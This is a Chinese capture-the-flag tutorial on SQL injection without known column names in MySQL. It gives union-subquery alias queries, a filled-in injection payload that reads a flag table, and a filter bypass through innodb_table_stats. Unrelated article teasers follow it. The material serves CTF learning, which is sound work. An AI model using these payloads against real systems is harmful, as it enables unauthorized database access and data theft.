CTF常用sql注入（三）无列名注入

news/2024/10/5 2:48:49/

0x06 无列名

适用于无法正确的查出结果，比如把information_schema给过滤了

select * from users;

在这里插入图片描述

select 1,2,3 union select * from users;

在这里插入图片描述

列名被替换成了1,2,3，
我们再利用子查询和别名查

select `2` from (select 1,2,3 union select * from users)a;

在这里插入图片描述
继续加大难度，不用反引号

select b from (select 1 as a,2 as b,3 as c union select * from users)u;

在这里插入图片描述
同时查询多个列

select concat(b,0x7e,c) from (select 1 as a,2 as b,3 as c union select * from users)u;

在这里插入图片描述
已知表名为flaga

password=\&username=,username=(select a from (select 1,2 as a,6 union select * from flaga limit 1,1)u)#

在这里插入图片描述
成功

也是针对or的过滤来查询表名

innodb_index_stats和innodb_table_stats表

例句，缺点就是只能查表，配合无列名查询一起食用

(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())#

Visual Studio Code（VSCode） 是一个高度可定制的代码编辑器，支持广泛的编程语言和构建系统。通过使用 Makefile 和适当的扩展，可以轻松地使用 VSCode 来管理基于 Make 的项目。以下是详细步骤，帮助你在 VSCode 中使用 …

背景作为linux 开发者，我们不可避免会接触到文件编程。比如通过文件记录程序配置参数，通过字符设备与外设进行通信。因此作为合格的linux开发者，一定要熟练掌握文件编程。在文件编程中，我们一般会有两类接口函数：标准…

1.编辑仓库 2.挂载 3.下载软件包 4.编辑named.conf 5.编辑named.haha 6.重启服务 7.验证本地域名是否解析

MinIO:开源对象存储解决方案的领先者 MinIO 是一款开源的对象存储系统，致力于提供高性能、可伸缩、安全的数据存储解决方案。官方解释：MinIO 是一个基于Apache License v2。0开源协议的对象存储服务。它兼容亚马逊S3云存储服务接口，非常适…

一：firewalld 高级配置 1.1:关于iptables的知识 IP 数据包过滤系统是一种功能强大的工具，可用于添加、编辑和除去规则，这些规则是在做数据包过滤决定时，防火墙所遵循和组成的规则。这些规则存储在专用的数据包过滤表中&#xf…

约束优化算法是一类专门处理目标函数在存在约束条件下求解最优解的方法。为了更好地理解约束优化算法，我们需要了解一些核心概念和基本方法。约束优化的核心概念可行域（Feasible Region）： 比喻：想象你在一个园艺场…

摘要随着我国经济迅速发展，人们对手机的需求越来越大，各种手机软件也都在被广泛应用，但是对于手机进行数据信息管理，对于手机的各种软件也是备受用户的喜爱，记账微信小程序被用户普遍使用，为方便用户能够…

文章目录前言知识点常见加密编码等算法解析资产架构&端口&应用&CDN&WAF&站库分离&负载均衡资产架构番外安全考虑阻碍前言在安全测试中常见的敏感信息密码等会采用加密方式，因此作为一名安全人员要了解常见加密。知识点主要有存储加…